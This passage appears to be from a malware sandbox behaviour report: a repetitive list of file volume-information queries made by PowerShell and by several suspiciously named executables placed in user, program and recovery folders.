Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Queries volume information: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe VolumeInformation
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Queries volume information: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe VolumeInformation
Source: C:\Users\user\Downloads\smartscreen.exe Queries volume information: C:\Users\user\Downloads\smartscreen.exe VolumeInformation
Source: C:\Users\user\Downloads\smartscreen.exe Queries volume information: C:\Users\user\Downloads\smartscreen.exe VolumeInformation
Source: C:\Recovery\WmiPrvSE.exe Queries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
Source: C:\Recovery\WmiPrvSE.exe Queries volume information: C:\Recovery\WmiPrvSE.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Queries volume information: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
